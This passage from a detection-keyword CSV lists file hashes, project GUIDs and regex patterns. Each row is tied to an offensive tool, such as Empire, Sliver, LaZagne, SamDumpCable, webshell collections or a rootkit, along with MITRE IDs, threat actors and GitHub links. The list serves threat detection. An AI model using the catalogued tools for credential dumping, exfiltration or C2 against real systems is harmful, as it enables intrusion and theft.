T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","22115" "*1337*/api/listeners?token=*",".{0,1000}1337.{0,1000}\/api\/listeners\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - 
Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","22116" "*1337*infernal-twin*",".{0,1000}1337.{0,1000}infernal\-twin.{0,1000}","offensive_tool_keyword","infernal-twin","This tool is created to aid the penetration testers in assessing wireless security.","T1533 - T1553 - T1560 - T1569 - T1583","TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/entropy1337/infernal-twin","1","1","N/A","network exploitation tool","N/A","10","1254","254","2022-10-27T11:39:14Z","2015-02-07T21:04:57Z","22117" "*1337OMGsam*",".{0,1000}1337OMGsam.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","22118" "*1337OMGsys*",".{0,1000}1337OMGsys.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","22119" "*13398b7c4a972fa76c0e79e34fd4df50dd08452e100c9ae6cf44c35e61a49745*",".{0,1000}13398b7c4a972fa76c0e79e34fd4df50dd08452e100c9ae6cf44c35e61a49745.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense 
Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","22120" "*13431429-2DB6-480F-B73F-CA019FE759E3*",".{0,1000}13431429\-2DB6\-480F\-B73F\-CA019FE759E3.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","22121" "*1358a679fb5b196075ae14c06133f304bcd259d5d7e86273805b7528ee5ef073*",".{0,1000}1358a679fb5b196075ae14c06133f304bcd259d5d7e86273805b7528ee5ef073.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22124" "*135af50a105b966d85fc745bdac0b918c1afa0c1a7d4bbaf66acbc89eb59172a*",".{0,1000}135af50a105b966d85fc745bdac0b918c1afa0c1a7d4bbaf66acbc89eb59172a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22127" "*1366b4cf8885fa1960344f67c82202ec3227b78a67c14c64ba981100ffe0991c*",".{0,1000}1366b4cf8885fa1960344f67c82202ec3227b78a67c14c64ba981100ffe0991c.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of 
outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","22128" "*13694645a7643abaa67d282782fdb6f7e246ab06436ff22f6a4dae55c65af5df*",".{0,1000}13694645a7643abaa67d282782fdb6f7e246ab06436ff22f6a4dae55c65af5df.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22130" "*136a55413120685e63b3ed8ceb5d3bc962aedaef520aa0d99ef347f7ae336f73*",".{0,1000}136a55413120685e63b3ed8ceb5d3bc962aedaef520aa0d99ef347f7ae336f73.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22131" "*1372ebd0f43824ac646712ab9b47a28938e2b58eb1dce8337c1d905dea0f7523*",".{0,1000}1372ebd0f43824ac646712ab9b47a28938e2b58eb1dce8337c1d905dea0f7523.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat 
sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","22134" "*1377aa737a1f18c35e3165b43f3c814a8bda8fe5facb019bbeffc2146dfd42a5*",".{0,1000}1377aa737a1f18c35e3165b43f3c814a8bda8fe5facb019bbeffc2146dfd42a5.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22135" "*137b032bd7485d528ecbd52168dcbab45d13c3902fda391c46a0665d72938dbb*",".{0,1000}137b032bd7485d528ecbd52168dcbab45d13c3902fda391c46a0665d72938dbb.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","22136" "*13827593b510bd2cb72270a7bd4aecfe90043112f1a70b879a36b0eaf1efcfa2*",".{0,1000}13827593b510bd2cb72270a7bd4aecfe90043112f1a70b879a36b0eaf1efcfa2.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22138" "*138fe6fe7171a4773027d687cf8b2e845b5e731ca1b239a5adb20cebe4b662ac*",".{0,1000}138fe6fe7171a4773027d687cf8b2e845b5e731ca1b239a5adb20cebe4b662ac.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22142" "*1392c9ae26021890c4fe0a3a960426da99e504d587b971408f40997d56e1ee63*",".{0,1000}1392c9ae26021890c4fe0a3a960426da99e504d587b971408f40997d56e1ee63.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22143" "*139c41629e75329a9582b0a3ca07327a134860d4cc3686795a5fb69d09ee50aa*",".{0,1000}139c41629e75329a9582b0a3ca07327a134860d4cc3686795a5fb69d09ee50aa.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22145" "*13A59BB8-0246-4FFA-951B-89B9A341F159*",".{0,1000}13A59BB8\-0246\-4FFA\-951B\-89B9A341F159.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","22146" "*13a77d1e3def5647f6d722269566e323c3a22c3793161bfda53cc7434e202b1e*",".{0,1000}13a77d1e3def5647f6d722269566e323c3a22c3793161bfda53cc7434e202b1e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22147" "*13ac39c3d0379d55f1fdab74b78354fd7d8c23ce43e0bd2f86c64ec21f2abe63*",".{0,1000}13ac39c3d0379d55f1fdab74b78354fd7d8c23ce43e0bd2f86c64ec21f2abe63.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22148" "*13b6173c509e41d78eff3266071dc52d6e45f81451d4203f20a761a748ce16f6*",".{0,1000}13b6173c509e41d78eff3266071dc52d6e45f81451d4203f20a761a748ce16f6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22150" "*13bc46a72770c8f6d5f8305a625a8be7aae244ca60c3ff781193f755ab525e8f*",".{0,1000}13bc46a72770c8f6d5f8305a625a8be7aae244ca60c3ff781193f755ab525e8f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22153" "*13C57810-FF18-4258-ABC9-935040A54F0B*",".{0,1000}13C57810\-FF18\-4258\-ABC9\-935040A54F0B.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation 
tool","https://github.com/Idov31/Nidhogg","1","0","#GUIDproject","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","22154" "*13c6d7d3ec0c0713c9640cf99fccfe1f6ac615cc4d7b7edc4b0f6e574ab1c2a4*",".{0,1000}13c6d7d3ec0c0713c9640cf99fccfe1f6ac615cc4d7b7edc4b0f6e574ab1c2a4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22155" "*13C84182-2F5F-4EE8-A37A-4483E7E57154*",".{0,1000}13C84182\-2F5F\-4EE8\-A37A\-4483E7E57154.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","0","#GUIDproject","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","22156" "*13ce1d09e6b47a8c35d56416c864710146fccb4a93d6ef11aa4e550bdb1aef31*",".{0,1000}13ce1d09e6b47a8c35d56416c864710146fccb4a93d6ef11aa4e550bdb1aef31.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","22157" "*13d035ab6eb82b5527186ca674d8e17a018fd7389320d0df32c8fa2551df45d8*",".{0,1000}13d035ab6eb82b5527186ca674d8e17a018fd7389320d0df32c8fa2551df45d8.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound 
- NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","22158" "*13d08385c57fa21b113a4c2afc60207313926a79fbca29ed9e9f675685cfb873*",".{0,1000}13d08385c57fa21b113a4c2afc60207313926a79fbca29ed9e9f675685cfb873.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22159" "*13d43aebab981754164f99adb93874642147e449bc9da03d03932d3884ac5acb*",".{0,1000}13d43aebab981754164f99adb93874642147e449bc9da03d03932d3884ac5acb.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","#filehash","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","22160" "*13d5d618565fd62c73768b9eb470d680972d27d6cfe85fa17692aeaca340d73e*",".{0,1000}13d5d618565fd62c73768b9eb470d680972d27d6cfe85fa17692aeaca340d73e.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22161" "*13dad918ff8a6a45552b0df38e2cb573cc3be2ce7fad3ae59d35b32be1ed6f9b*",".{0,1000}13dad918ff8a6a45552b0df38e2cb573cc3be2ce7fad3ae59d35b32be1ed6f9b.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","22162" "*13de5a5579354f61ec2220bdc9f6bf0468243a850ab99a56bbdf2549145d30f6*",".{0,1000}13de5a5579354f61ec2220bdc9f6bf0468243a850ab99a56bbdf2549145d30f6.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","22165" "*13e50600945f06df6bbbf28c06f76ad655acfbd866cdac2845fc48be282b7e6a*",".{0,1000}13e50600945f06df6bbbf28c06f76ad655acfbd866cdac2845fc48be282b7e6a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22167" "*13ef95f2a3a43e67984999804e255ac93cdc9d9f8df85a188ba04700f6f4565c*",".{0,1000}13ef95f2a3a43e67984999804e255ac93cdc9d9f8df85a188ba04700f6f4565c.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Collection of self-made Red Team tools","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","#filehash","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","22168" "*13f225c454a7e1468244c9dbaad2e1968034e6aea0e16cb67a5139d798e05fbb*",".{0,1000}13f225c454a7e1468244c9dbaad2e1968034e6aea0e16cb67a5139d798e05fbb.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22169" "*13f42e004a25be9ba99aee3396a1d810026d7750d1e199774c5ba8410b15ae30*",".{0,1000}13f42e004a25be9ba99aee3396a1d810026d7750d1e199774c5ba8410b15ae30.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22171" "*13fecc8eb1d401a6f859dce7225b08edb68349cdd12c7ce8388a3076b50d470a*",".{0,1000}13fecc8eb1d401a6f859dce7225b08edb68349cdd12c7ce8388a3076b50d470a.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - 
T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","22172" "*14083A04-DD4B-4E7D-A16E-86947D3D6D74*",".{0,1000}14083A04\-DD4B\-4E7D\-A16E\-86947D3D6D74.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","#GUIDproject","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","22174" "*140bfb676a49c80b80f126ce16f37731aeb8ddbab4fdf67083676fc0d80c26e0*",".{0,1000}140bfb676a49c80b80f126ce16f37731aeb8ddbab4fdf67083676fc0d80c26e0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22175" "*1416d3d651adeb29acbc825d7d537a379fdcb78102c36842a876dcf29e76c0e8*",".{0,1000}1416d3d651adeb29acbc825d7d537a379fdcb78102c36842a876dcf29e76c0e8.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22178" "*14268c474399ba634f0aedcd2411566fe97ceaecd2877cb14980c99bc43af31d*",".{0,1000}14268c474399ba634f0aedcd2411566fe97ceaecd2877cb14980c99bc43af31d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22179" "*14268f4b4154d80f6c8a20bd79cca08e829cfef4d5f5c244d968c3652da7a336*",".{0,1000}14268f4b4154d80f6c8a20bd79cca08e829cfef4d5f5c244d968c3652da7a336.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","22180" "*142b0a3e5c25ea73c368ef0f7d4d28136120e4927a59cd9f8fef258dc63c9ecf*",".{0,1000}142b0a3e5c25ea73c368ef0f7d4d28136120e4927a59cd9f8fef258dc63c9ecf.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22182" "*142d3b96f2c42d4660afb05c725185377a58cf521667ed4efc360171ffcc2e97*",".{0,1000}142d3b96f2c42d4660afb05c725185377a58cf521667ed4efc360171ffcc2e97.{0,1000}","offensive_tool_keyword","sliver","Sliver is an 
open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22183" "*142e61b92c40934e121c6204ad4a9cd2893cb3566e982a15d6df55454fe782af*",".{0,1000}142e61b92c40934e121c6204ad4a9cd2893cb3566e982a15d6df55454fe782af.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 